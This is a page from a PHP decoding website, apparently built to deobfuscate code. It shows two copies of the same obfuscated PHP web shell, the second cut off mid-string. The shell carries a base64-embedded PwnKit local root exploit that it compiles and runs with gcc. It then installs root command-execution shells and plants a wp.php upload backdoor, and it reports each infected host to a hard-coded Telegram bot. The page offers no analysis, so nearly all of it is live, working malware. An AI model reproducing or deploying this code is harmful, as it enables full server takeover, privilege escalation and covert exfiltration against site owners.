Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto BYIW8; M5J06: function sendcmd() { $files = "PD9waHAKaWYoIWZ1bmN0aW9uX2V4aXN..
Decoded Output download
<?php
goto BYIW8; M5J06: function sendcmd() { $files = "PD9waHAKaWYoIWZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKSB7CgkkdXNlciA9IEBnZXRfY3VycmVudF91c2VyKCk7CgkkdWlkID0gQGdldG15dWlkKCk7CgkkZ2lkID0gQGdldG15Z2lkKCk7CgkkZ3JvdXAgPSAiPyI7Cn0gZWxzZSB7CgkkdWlkID0gQHBvc2l4X2dldHB3dWlkKHBvc2l4X2dldGV1aWQoKSk7CgkkZ2lkID0gQHBvc2l4X2dldGdyZ2lkKHBvc2l4X2dldGVnaWQoKSk7CgkkdXNlciA9ICR1aWRbJ25hbWUnXTsKCSR1aWQgPSAkdWlkWyd1aWQnXTsKCSRncm91cCA9ICRnaWRbJ25hbWUnXTsKCSRnaWQgPSAkZ2lkWydnaWQnXTsKfQoKJGtlcm5lbCA9IHBocF91bmFtZSgpOwo/PgoKPCFET0NUWVBFIGh0bWw+CjxodG1sPgoJPGhlYWQ+CgkJPHRpdGxlPi4vRGFsMHZlejQwNDwvdGl0bGU+CgkJPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly9hamF4Lmdvb2dsZWFwaXMuY29tL2FqYXgvbGlicy9qcXVlcnkvMy41LjEvanF1ZXJ5Lm1pbi5qcyI+PC9zY3JpcHQ+Cgk8L2hlYWQ+Cjxib2R5PgoJPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249Inl1dWtpMi5waHAiPgoJCTxoMj5ST09UIFNIRUxMIEVYRUNVVE9SPC9oMj48YnI+CgkJPD9waHAgZWNobygiU1lTVEVNOiAka2VybmVsPGJyPiIpOyA/PgoJCTw/cGhwIGVjaG8oIlVJRC9HSUQ6ICR1c2VyICggJHVpZCApIHwgJGdyb3VwICggJGdpZCApPGJyPjxicj4iKTsgPz4KCQk8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ieXV1a2kiIGlkPSd5dXVraSc+PC9pbnB1dD4KCQk8YnV0dG9uIGlkPSJidG4iIHR5cGU9InN1Ym1pdCI+S2lyaW08L2J1dHRvbj4KCTwvZm9ybT4KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KCQkkKGZ1bmN0aW9uKCl7CgkJCSQoImZvcm0iKS5zdWJtaXQoZnVuY3Rpb24oKXsKCQkJCSQuYWpheCh7CgkJCQkJdXJsOiQodGhpcykuYXR0cigiYWN0aW9uIiksCgkJCQkJZGF0YTokKHRoaXMpLnNlcmlhbGl6ZSgpLAoJCQkJCXR5cGU6JCh0aGlzKS5hdHRyKCJtZXRob2QiKSwKCQkJCQlkYXRhVHlwZTogJ2h0bWwnLAoJCQkJCWJlZm9yZVNlbmQ6IGZ1bmN0aW9uKCkgewoJCQkJCQkkKCJpbnB1dCIpLmF0dHIoImRpc2FibGVkIix0cnVlKTsKCQkJCQkJJCgiYnV0dG9uIikuYXR0cigiZGlzYWJsZWQiLHRydWUpOwoJCQkJCX0sCgkJCQkJY29tcGxldGU6ZnVuY3Rpb24oKSB7CgkJCQkJCSQoImlucHV0IikuYXR0cigiZGlzYWJsZWQiLGZhbHNlKTsKCQkJCQkJJCgiYnV0dG9uIikuYXR0cigiZGlzYWJsZWQiLGZhbHNlKTsJCQkJCQkJCQoJCQkJCX0sCgkJCQkJc3VjY2VzczpmdW5jdGlvbihoYXNpbCkgewoJCQkJCQl2YXIgdHh0ID0gJCgiI3l1dWtpIik7CgkJCQkJCWlmKHR4dC52YWwoKS50cmltKCkubGVuZ3RoIDwgMSkgewoJCQkJCQkJYWxlcnQoImlucHV0IGNtZCBiZWZvcmVTZW5kIik7CgkJCQkJCX1lbHNlewoJCQkJCQkJJCgiI3NoZWxscmVzcG9uIikuaHRtbCgnPHByZT4nICsgaGFzaWwgKyAnPC9wcmU+Jyk7CgkJCQkJCQkkKCJmb3JtIilbMF0ucmVzZXQoKTsKCQkJCQkJCXNldFRpbWVvdXQoZnVuY3Rpb24oKXsKCQkJCQkJCQkkKCJpbnB1dCIpLmZvY3VzKCk7CgkJCQkJCQl9LDEwMDApOwoJCQkJCQl9CgkJCQkJfQoJCQkJfSkKCQkJcmV0dXJuIGZhbHNlOwoJCQl9KTsKCQl9KTsKCTwvc2NyaXB0PgoJPGRpdiBpZD0ic2hlbGxyZXNwb24iPjwvZGl2PgoJPC9ib2R5Pgo8L2h0bWw+"; $fp = fopen("rootshell.php", "w"); fwrite($fp, base64_decode($files)); fclose($fp); return True; } goto R8GbK; R8GbK: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto g_Otp; z2Ez2: if (isset($_POST["gass"])) { $spawn_rootc = yuuki_rootc(); if ($spawn_rootc) { if (file_exists("prvesc.c")) { $gass = system("gcc prvesc.c -o prvesc; chmod +x prvesc; ./prvesc"); if (file_exists("yuuki")) { $makefile_rootshellpy = rootshell_py(); $makefile_process = process(); $make_sendcmd = sendcmd(); if ($make_sendcmd) { echo "w00t, <a href='rootshell.php' target='_blank'>klik here</a> and enjoy run command as root ^_^"; } } else { print "Can't root this server!"; } } else { print "Can't write file!"; } } } goto yIKTR; wRYxw: function process() { $proc = "PD9waHAKaGVhZGVyKCdBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46IConKTsKaWYoJF9QT1NUKSB7CiAgJHNlbmRfY21kID0gc3lzdGVtKCdweXRob24gcm9vdHNoZWxsLnB5ICInIC4gJF9QT1NUWyJ5dXVraSJdIC4gJyIgMj4mMScpOwogIGVjaG8oJHNlbmRfY21kKTsKfQo/Pg=="; $fp = fopen("yuuki2.php", "w"); fwrite($fp, base64_decode($proc)); fclose($fp); return True; } goto M5J06; S6XtV: eval(base64_decode($cox)); goto O6vZ0; PN9Or: $pkexec = exe("pkexec --version") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto flGGY; eBFAC: echo "SYSTEM: {$kernel}<br>"; goto O_197; yIKTR: $cox = "JG5hbWEgPSAnd3AucGhwJzsKJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICcvJy4kbmFtYS4nJzsKJGZpbGVzID0gIlBEOXdhSEFLWlhKeWIzSmZjbVZ3YjNKMGFXNW5LREFwT3dvS2FXWW9hWE56WlhRb0pGOUhSVlJiSWtOb2FYUnZaMlVpWFNrcElIc0tJQ0FnSUdWamFHOGdJanhvTVQ0OGFUNHVMMFJoYkRCMlpYbzBNRFFnUERNOEwyaytQQzlvTVQ0OFluSStJanNLSUNBZ0lHVmphRzhnSWp4aVBqeHdhSEIxYm1GdFpUNGlMbkJvY0Y5MWJtRnRaU2dwTGlJOEwzQm9jSFZ1WVcxbFBqd3ZZajQ4WW5JK0lqc0tJQ0FnSUdWamFHOGdJanhtYjNKdElHMWxkR2h2WkQwbmNHOXpkQ2NnWlc1amRIbHdaVDBuYlhWc2RHbHdZWEowTDJadmNtMHRaR0YwWVNjK0NpQWdJQ0FnSUNBZ0lDQThhVzV3ZFhRZ2RIbHdaVDBuWm1sc1pTY2dibUZ0WlQwbmFXUjRYMlpwYkdVblBnb2dJQ0FnSUNBZ0lDQWdQR2x1Y0hWMElIUjVjR1U5SjNOMVltMXBkQ2NnYm1GdFpUMG5kWEJzYjJGa0p5QjJZV3gxWlQwbmRYQnNiMkZrSno0S0lDQWdJQ0FnSUNBZ0lEd3ZabTl5YlQ0aU93b2dJQ0FnSkhKdmIzUWdQU0FrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRPd29nSUNBZ0pHWnBiR1Z6SUQwZ0pGOUdTVXhGVTFzbmFXUjRYMlpwYkdVblhWc25ibUZ0WlNkZE93b2dJQ0FnSkdSbGMzUWdQU0FrY205dmRDNG5MeWN1SkdacGJHVnpPd29nSUNBZ2FXWW9hWE56WlhRb0pGOVFUMU5VV3lkMWNHeHZZV1FuWFNrcElIc0tJQ0FnSUNBZ0lDQnBaaWhwYzE5M2NtbDBZV0pzWlNna2NtOXZkQ2twSUhzS0lDQWdJQ0FnSUNBZ0lDQWdhV1lvUUdOdmNIa29KRjlHU1V4RlUxc25hV1I0WDJacGJHVW5YVnNuZEcxd1gyNWhiV1VuWFN3Z0pHUmxjM1FwS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa2QyVmlJRDBnSW1oMGRIQTZMeThpTGlSZlUwVlNWa1ZTV3lkSVZGUlFYMGhQVTFRblhUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHVmphRzhnSWxOMWEzTmxjeUF0UGlBOFlTQm9jbVZtUFNja2QyVmlMeVJtYVd4bGN5Y2dkR0Z5WjJWMFBTZGZZbXhoYm1zblBqeGlQangxUGlSM1pXSXZKR1pwYkdWelBDOTFQand2WWo0OEwyRStJanNLSUNBZ0lDQWdJQ0FnSUNBZ2ZTQmxiSE5sSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWamFHOGdJbWRoWjJGc0lIVndiRzloWkNCa2FTQmtiMk4xYldWdWRDQnliMjkwTGlJN0NpQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0I5SUdWc2MyVWdld29nSUNBZ0lDQWdJQ0FnSUNCcFppaEFZMjl3ZVNna1gwWkpURVZUV3lkcFpIaGZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRMQ0FrWm1sc1pYTXBLU0I3Q2lBZ0lDQWdJQ0FnSUNBZ0lDQWdJQ0JsWTJodklDSnpkV3R6WlhNZ2RYQnNiMkZrSUR4aVBpUm1hV3hsY3p3dllqNGdaR2tnWm05c1pHVnlJR2x1YVNJN0NpQWdJQ0FnSUNBZ0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdJQ0FnSUNBZ0lDQmxZMmh2SUNKbllXZGhiQ0IxY0d4dllXUWlPd29nSUNBZ0lDQWdJQ0FnSUNCOUNpQWdJQ0FnSUNBZ2ZRb2dJQ0FnZlFwOUlHVnNjMlZwWmlocGMzTmxkQ2drWDBkRlZGc2lTMmx5YVhOaGEya2lYU2twZXdvSkpHaHZiV1ZsSUQwZ0pGOVRSVkpXUlZKYkowUlBRMVZOUlU1VVgxSlBUMVFuWFRzS0NTUmpaMlp6SUQwZ1pYaHdiRzlrWlNnaUx5SXNKR2h2YldWbEtUc0tDU1JpZFdsc1pDQTlJQ2N2Snk0a1kyZG1jMXN4WFM0bkx5Y3VKR05uWm5OYk1sMHVKeTh1WTJGblpXWnpKenNLQ1dsbUtHbHpYMlJwY2lna1luVnBiR1FwS1NCN0Nna0paV05vYnlnaVEyeHZkV1JNYVc1MWVDQTlQaUJVY25WbElpazdDZ2w5SUdWc2MyVWdld29KQ1dWamFHOG9Ja05zYjNWa1RHbHVkWGdnUFQ0Z1JtRnNjMlVpS1RzS0NYMEtmV1ZzYzJVZ2V3b2dJQ0FnYUdWaFpHVnlLQ2RJVkZSUUx6RXVNU0EwTURNZ1JtOXlZbWxrWkdWdUp5azdDbjBLUHo0PSI7CiRvcGVuID0gZm9wZW4oJG5hbWEsICd3Jyk7CmZ3cml0ZSgkb3BlbiwgYmFzZTY0X2RlY29kZSgkZmlsZXMpKTsKZmNsb3NlKCRvcGVuKTsKaWYoZmlsZV9leGlzdHMoJGNoZWNrKSl7CiAgICAgICAgJHN5cyA9IHBocF91bmFtZSgpOyAKICAgICAgICAkbGloYXQgPSBnZXRjd2QoKTsKICAgICAgICAkZG9tZW4gPSAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXTsKICAgICAgICAkdGVtcGF0ID0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiAgICAgICAgJGRhdGEgPSBbCiAgICAgICAgICAgICAgICAnY2hhdF9pZCcgPT4gJzEzMzAzNzc5MzAnLAogICAgICAgICAgICAgICAgJ3RleHQnID0+ICIgJGRvbWVuJHRlbXBhdCBcclxuIEJhY2tkb29yIC0+ICRuYW1hP0NoaXRvZ2VcclxuICRzeXMgXHJcbiIgXTsKICAgICAgICAkcmVzcG9uc2UgPSBmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9hcGkudGVsZWdyYW0ub3JnL2JvdDY1Mjg2OTE2Mzc6QUFHTTgtSXc0cXRVY3g5aVFoUEhUSFpEc09DZ21YTDdLemcvc2VuZE1lc3NhZ2U/IiAuIGh0dHBfYnVpbGRfcXVlcnkoJGRhdGEpICk7Cn1lbHNlewogICAgICAgICRwID0gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ107CiAgICAgICAgJHAgLj0gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ107CiAgICAgICAgJGRhdGEgPSBbCiAgICAgICAgICAgICAgICAnY2hhdF9pZCcgPT4gJzEzMzAzNzc5MzAnLAogICAgICAgICAgICAgICAgJ3RleHQnID0+ICIgJHAgIiBdOwogICAgICAgICRyZXNwb25zZSA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwczovL2FwaS50ZWxlZ3JhbS5vcmcvYm90NjUyODY5MTYzNzpBQUdNOC1JdzRxdFVjeDlpUWhQSFRIWkRzT0NnbVhMN0t6Zy9zZW5kTWVzc2FnZT8iIC4gaHR0cF9idWlsZF9xdWVyeSgkZGF0YSkgKTsKCn0="; goto S6XtV; flGGY: function yuuki_rootc() { $privesc = "LyoKICogUHJvb2Ygb2YgQ29uY2VwdCBmb3IgUHduS2l0OiBMb2NhbCBQcml2aWxlZ2UgRXNjYWxhdGlvbiBWdWxuZXJhYmlsaXR5IERpc2NvdmVyZWQgaW4gcG9sa2l04oCZcyBwa2V4ZWMgKENWRS0yMDIxLTQwMzQpIGJ5IEFuZHJpcyBSYXVndWxpcyA8bW9vQGFydGhlcHN5LmV1PgogKiBBZHZpc29yeTogaHR0cHM6Ly9ibG9nLnF1YWx5cy5jb20vdnVsbmVyYWJpbGl0aWVzLXRocmVhdC1yZXNlYXJjaC8yMDIyLzAxLzI1L3B3bmtpdC1sb2NhbC1wcml2aWxlZ2UtZXNjYWxhdGlvbi12dWxuZXJhYmlsaXR5LWRpc2NvdmVyZWQtaW4tcG9sa2l0cy1wa2V4ZWMtY3ZlLTIwMjEtNDAzNAogKi8KI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgoKY2hhciAqc2hlbGwgPSAKCSIjaW5jbHVkZSA8c3RkaW8uaD5cbiIKCSIjaW5jbHVkZSA8c3RkbGliLmg+XG4iCgkiI2luY2x1ZGUgPHVuaXN0ZC5oPlxuXG4iCgkidm9pZCBnY29udigpIHt9XG4iCgkidm9pZCBnY29udl9pbml0KCkge1xuIgoJIglzZXR1aWQoMCk7IHNldGdpZCgwKTtcbiIKCSIJc2V0ZXVpZCgwKTsgc2V0ZWdpZCgwKTtcbiIKCSIJc3lzdGVtKFwiZXhwb3J0IFBBVEg9L3Vzci9sb2NhbC9zYmluOi91c3IvbG9jYWwvYmluOi91c3Ivc2JpbjovdXNyL2Jpbjovc2JpbjovYmluOyBybSAtcmYgJ0dDT05WX1BBVEg9LicgJ3B3bmtpdCc7IGNob3duIHJvb3Q6cm9vdCB5dXVraTsgY2htb2QgNDc3NyB5dXVraTsgL2Jpbi9zaFwiKTtcbiIKCSIJZXhpdCgwKTtcbiIKCSJ9IjsKCmNoYXIgKmdldHJvb3QgPSAKCSIjaW5jbHVkZSA8dW5pc3RkLmg+XG4iCgkiI2luY2x1ZGUgPHN0ZGlvLmg+XG4iCgkiaW50IG1haW4gKHZvaWQpXG4iCgkie1xuIgoJIglzZXRnaWQoMCk7XG4iCgkiCXNldHVpZCgwKTtcbiIKCSIJc3lzdGVtKFwiL2Jpbi9iYXNoXCIpO1xuIgoJIglyZXR1cm4gMDtcbiIKCSJ9IjsKCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsKCUZJTEUgKmZwOwoJRklMRSAqZ3I7CglzeXN0ZW0oIm1rZGlyIC1wICdHQ09OVl9QQVRIPS4nOyB0b3VjaCAnR0NPTlZfUEFUSD0uL3B3bmtpdCc7IGNobW9kIGEreCAnR0NPTlZfUEFUSD0uL3B3bmtpdCciKTsKCXN5c3RlbSgibWtkaXIgLXAgcHdua2l0OyBlY2hvICdtb2R1bGUgVVRGLTgvLyBQV05LSVQvLyBwd25raXQgMicgPiBwd25raXQvZ2NvbnYtbW9kdWxlcyIpOwoJZnAgPSBmb3BlbigicHdua2l0L3B3bmtpdC5jIiwgInciKTsKCWZwcmludGYoZnAsICIlcyIsIHNoZWxsKTsKCWZjbG9zZShmcCk7CgoJZ3IgPSBmb3BlbigiZ2V0cm9vdC5jIiwgInciKTsKCWZwcmludGYoZ3IsICIlcyIsIGdldHJvb3QpOwoJZmNsb3NlKGdyKTsKCglzeXN0ZW0oImdjYyBnZXRyb290LmMgLW8geXV1a2kiKTsKCglzeXN0ZW0oImdjYyBwd25raXQvcHdua2l0LmMgLW8gcHdua2l0L3B3bmtpdC5zbyAtc2hhcmVkIC1mUElDIik7CgljaGFyICplbnZbXSA9IHsgInB3bmtpdCIsICJQQVRIPUdDT05WX1BBVEg9LiIsICJDSEFSU0VUPVBXTktJVCIsICJTSEVMTD1wd25raXQiLCBOVUxMIH07CglleGVjdmUoIi91c3IvYmluL3BrZXhlYyIsIChjaGFyKltdKXtOVUxMfSwgZW52KTsKfQ=="; $fp = file_put_contents("prvesc.c", base64_decode($privesc)); return True; } goto O5AUA; O_197: echo "UID/GID: {$user} ( {$uid} ) | {$group} ( {$gid} )<br>"; goto M2oxq; g_Otp: $kernel = php_uname(); goto eBFAC; M2oxq: echo "SYSTEM_FUNCTION: {$check_system} | GCC: {$gcc} | PYTHON: {$python} | PKEXEC: {$pkexec}</br>"; goto S5AjL; KodFN: $check_system = function_exists("system") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto sFw1U; bN1bX: @ini_set("output_buffering", 0); goto tZdjz; tZdjz: @ini_set("display_errors", 0); goto C39Og; C39Og: set_time_limit(0); goto vLgiU; sFw1U: $python = exe("python --help") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto iT3MM; S5AjL: echo "<br><br>make sure system_function, gcc, python, pkexec all enabled<br>"; goto Q3Gd3; Q3Gd3: ?>
<form action=""method="POST"><input name="gass"type="submit"value="touch me senpai!!!"></form><?php goto z2Ez2; O5AUA: function rootshell_py() { $rootshell = "IyEvYmluL3B5dGhvbgojIC0qLSBjb2Rpbmc6IHV0Zi04IC0qLQpmcm9tICAgIHN1YnByb2Nlc3MgaW1wb3J0IFBvcGVuLCBQSVBFLCBTVERPVVQKaW1wb3J0ICB0aW1lCmltcG9ydCAgb3MKaW1wb3J0ICBzeXMKIApleHBsb2l0ID0gJy4veXV1a2knCmNtZHMgICAgPSBzeXMuYXJndlsxXQogCnAgPSBQb3BlbihbZXhwbG9pdCwgJyddLCBzdGRvdXQ9UElQRSwgc3RkaW49UElQRSwgc3RkZXJyPVNURE9VVCkKcHJpbnQoc3RyKHAuY29tbXVuaWNhdGUoY21kcylbMF0pKQ=="; $fp = fopen("rootshell.py", "w"); fwrite($fp, base64_decode($rootshell)); fclose($fp); return True; } goto wRYxw; iT3MM: $gcc = exe("gcc --help") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto PN9Or; BYIW8: ?>
<!doctypehtml><html><head><title> </title><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"type="text/javascript"></script></head></html><?php goto bN1bX; vLgiU: function exe($cmd) { if (function_exists("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } } goto KodFN; O6vZ0: ?>Did this file decode correctly?
Original Code
<?php
goto BYIW8; M5J06: function sendcmd() { $files = "PD9waHAKaWYoIWZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKSB7CgkkdXNlciA9IEBnZXRfY3VycmVudF91c2VyKCk7CgkkdWlkID0gQGdldG15dWlkKCk7CgkkZ2lkID0gQGdldG15Z2lkKCk7CgkkZ3JvdXAgPSAiPyI7Cn0gZWxzZSB7CgkkdWlkID0gQHBvc2l4X2dldHB3dWlkKHBvc2l4X2dldGV1aWQoKSk7CgkkZ2lkID0gQHBvc2l4X2dldGdyZ2lkKHBvc2l4X2dldGVnaWQoKSk7CgkkdXNlciA9ICR1aWRbJ25hbWUnXTsKCSR1aWQgPSAkdWlkWyd1aWQnXTsKCSRncm91cCA9ICRnaWRbJ25hbWUnXTsKCSRnaWQgPSAkZ2lkWydnaWQnXTsKfQoKJGtlcm5lbCA9IHBocF91bmFtZSgpOwo/PgoKPCFET0NUWVBFIGh0bWw+CjxodG1sPgoJPGhlYWQ+CgkJPHRpdGxlPi4vRGFsMHZlejQwNDwvdGl0bGU+CgkJPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly9hamF4Lmdvb2dsZWFwaXMuY29tL2FqYXgvbGlicy9qcXVlcnkvMy41LjEvanF1ZXJ5Lm1pbi5qcyI+PC9zY3JpcHQ+Cgk8L2hlYWQ+Cjxib2R5PgoJPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249Inl1dWtpMi5waHAiPgoJCTxoMj5ST09UIFNIRUxMIEVYRUNVVE9SPC9oMj48YnI+CgkJPD9waHAgZWNobygiU1lTVEVNOiAka2VybmVsPGJyPiIpOyA/PgoJCTw/cGhwIGVjaG8oIlVJRC9HSUQ6ICR1c2VyICggJHVpZCApIHwgJGdyb3VwICggJGdpZCApPGJyPjxicj4iKTsgPz4KCQk8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ieXV1a2kiIGlkPSd5dXVraSc+PC9pbnB1dD4KCQk8YnV0dG9uIGlkPSJidG4iIHR5cGU9InN1Ym1pdCI+S2lyaW08L2J1dHRvbj4KCTwvZm9ybT4KCTxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4KCQkkKGZ1bmN0aW9uKCl7CgkJCSQoImZvcm0iKS5zdWJtaXQoZnVuY3Rpb24oKXsKCQkJCSQuYWpheCh7CgkJCQkJdXJsOiQodGhpcykuYXR0cigiYWN0aW9uIiksCgkJCQkJZGF0YTokKHRoaXMpLnNlcmlhbGl6ZSgpLAoJCQkJCXR5cGU6JCh0aGlzKS5hdHRyKCJtZXRob2QiKSwKCQkJCQlkYXRhVHlwZTogJ2h0bWwnLAoJCQkJCWJlZm9yZVNlbmQ6IGZ1bmN0aW9uKCkgewoJCQkJCQkkKCJpbnB1dCIpLmF0dHIoImRpc2FibGVkIix0cnVlKTsKCQkJCQkJJCgiYnV0dG9uIikuYXR0cigiZGlzYWJsZWQiLHRydWUpOwoJCQkJCX0sCgkJCQkJY29tcGxldGU6ZnVuY3Rpb24oKSB7CgkJCQkJCSQoImlucHV0IikuYXR0cigiZGlzYWJsZWQiLGZhbHNlKTsKCQkJCQkJJCgiYnV0dG9uIikuYXR0cigiZGlzYWJsZWQiLGZhbHNlKTsJCQkJCQkJCQoJCQkJCX0sCgkJCQkJc3VjY2VzczpmdW5jdGlvbihoYXNpbCkgewoJCQkJCQl2YXIgdHh0ID0gJCgiI3l1dWtpIik7CgkJCQkJCWlmKHR4dC52YWwoKS50cmltKCkubGVuZ3RoIDwgMSkgewoJCQkJCQkJYWxlcnQoImlucHV0IGNtZCBiZWZvcmVTZW5kIik7CgkJCQkJCX1lbHNlewoJCQkJCQkJJCgiI3NoZWxscmVzcG9uIikuaHRtbCgnPHByZT4nICsgaGFzaWwgKyAnPC9wcmU+Jyk7CgkJCQkJCQkkKCJmb3JtIilbMF0ucmVzZXQoKTsKCQkJCQkJCXNldFRpbWVvdXQoZnVuY3Rpb24oKXsKCQkJCQkJCQkkKCJpbnB1dCIpLmZvY3VzKCk7CgkJCQkJCQl9LDEwMDApOwoJCQkJCQl9CgkJCQkJfQoJCQkJfSkKCQkJcmV0dXJuIGZhbHNlOwoJCQl9KTsKCQl9KTsKCTwvc2NyaXB0PgoJPGRpdiBpZD0ic2hlbGxyZXNwb24iPjwvZGl2PgoJPC9ib2R5Pgo8L2h0bWw+"; $fp = fopen("rootshell.php", "w"); fwrite($fp, base64_decode($files)); fclose($fp); return True; } goto R8GbK; R8GbK: if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } goto g_Otp; z2Ez2: if (isset($_POST["gass"])) { $spawn_rootc = yuuki_rootc(); if ($spawn_rootc) { if (file_exists("prvesc.c")) { $gass = system("gcc prvesc.c -o prvesc; chmod +x prvesc; ./prvesc"); if (file_exists("yuuki")) { $makefile_rootshellpy = rootshell_py(); $makefile_process = process(); $make_sendcmd = sendcmd(); if ($make_sendcmd) { echo "w00t, <a href='rootshell.php' target='_blank'>klik here</a> and enjoy run command as root ^_^"; } } else { print "Can't root this server!"; } } else { print "Can't write file!"; } } } goto yIKTR; wRYxw: function process() { $proc = "PD9waHAKaGVhZGVyKCdBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46IConKTsKaWYoJF9QT1NUKSB7CiAgJHNlbmRfY21kID0gc3lzdGVtKCdweXRob24gcm9vdHNoZWxsLnB5ICInIC4gJF9QT1NUWyJ5dXVraSJdIC4gJyIgMj4mMScpOwogIGVjaG8oJHNlbmRfY21kKTsKfQo/Pg=="; $fp = fopen("yuuki2.php", "w"); fwrite($fp, base64_decode($proc)); fclose($fp); return True; } goto M5J06; S6XtV: eval(base64_decode($cox)); goto O6vZ0; PN9Or: $pkexec = exe("pkexec --version") ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; goto flGGY; eBFAC: echo "SYSTEM: {$kernel}<br>"; goto O_197; yIKTR: $cox = "JG5hbWEgPSAnd3AucGhwJzsKJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICcvJy4kbmFtYS4nJzsKJGZpbGVzID0gIlBEOXdhSEFLWlhKeWIzSmZjbVZ3YjNKMGFXNW5LREFwT3dvS2FXWW9hWE56WlhRb0pGOUhSVlJiSWtOb2FYUnZaMlVpWFNrcElIc0tJQ0FnSUdWamFHOGdJanhvTVQ0OGFUNHVMMFJoYkRCMlpYbzBNRFFnUERNOEwyaytQQzlvTVQ0OFluSStJanNLSUNBZ0lHVmphRzhnSWp4aVBqeHdhSEIxYm1GdFpUNGlMbkJvY0Y5MWJtRnRaU2dwTGlJOEwzQm9jSFZ1WVcxbFBqd3ZZajQ4WW5JK0lqc0tJQ0FnSUdWamFHOGdJanhtYjNKdElHMWxkR2h2WkQwbmNHOXpkQ2NnWlc1amRIbHdaVDBuYlhWc2RHbHdZWEowTDJadmNtMHRaR0YwWVNjK0NpQWdJQ0FnSUNBZ0lDQThhVzV3ZFhRZ2RIbHdaVDBuWm1sc1pTY2dibUZ0WlQwbmFXUjRYMlpwYkdVblBnb2dJQ0FnSUNBZ0lDQWdQR2x1Y0hWMElIUjVjR1U5SjNOMVltMXBkQ2NnYm1GdFpUMG5kWEJzYjJGa0p5QjJZV3gxWlQwbmRYQnNiMkZrSno0S0lDQWdJQ0FnSUNBZ0lEd3ZabTl5YlQ0aU93b2dJQ0FnSkhKdmIzUWdQU0FrWDFORlVsWkZVbHNuUkU5RFZVMUZUbFJmVWs5UFZDZGRPd29nSUNBZ0pHWnBiR1Z6SUQwZ0pGOUdTVXhGVTFzbmFXUjRYMlpwYkdVblhWc25ibUZ0WlNkZE93b2dJQ0FnSkdSbGMzUWdQU0FrY205dmRDNG5MeWN1SkdacGJHVnpPd29nSUNBZ2FXWW9hWE56WlhRb0pGOVFUMU5VV3lkMWNHeHZZV1FuWFNrcElIc0tJQ0FnSUNBZ0lDQnBaaWhwYzE5M2NtbDBZV0pzWlNna2NtOXZkQ2twSUhzS0lDQWdJQ0FnSUNBZ0lDQWdhV1lvUUdOdmNIa29KRjlHU1V4RlUxc25hV1I0WDJacGJHVW5YVnNuZEcxd1gyNWhiV1VuWFN3Z0pHUmxjM1FwS1NCN0NpQWdJQ0FnSUNBZ0lDQWdJQ0FnSUNBa2QyVmlJRDBnSW1oMGRIQTZMeThpTGlSZlUwVlNWa1ZTV3lkSVZGUlFYMGhQVTFRblhUc0tJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lHVmphRzhnSWxOMWEzTmxjeUF0UGlBOFlTQm9jbVZtUFNja2QyVmlMeVJtYVd4bGN5Y2dkR0Z5WjJWMFBTZGZZbXhoYm1zblBqeGlQangxUGlSM1pXSXZKR1pwYkdWelBDOTFQand2WWo0OEwyRStJanNLSUNBZ0lDQWdJQ0FnSUNBZ2ZTQmxiSE5sSUhzS0lDQWdJQ0FnSUNBZ0lDQWdJQ0FnSUdWamFHOGdJbWRoWjJGc0lIVndiRzloWkNCa2FTQmtiMk4xYldWdWRDQnliMjkwTGlJN0NpQWdJQ0FnSUNBZ0lDQWdJSDBLSUNBZ0lDQWdJQ0I5SUdWc2MyVWdld2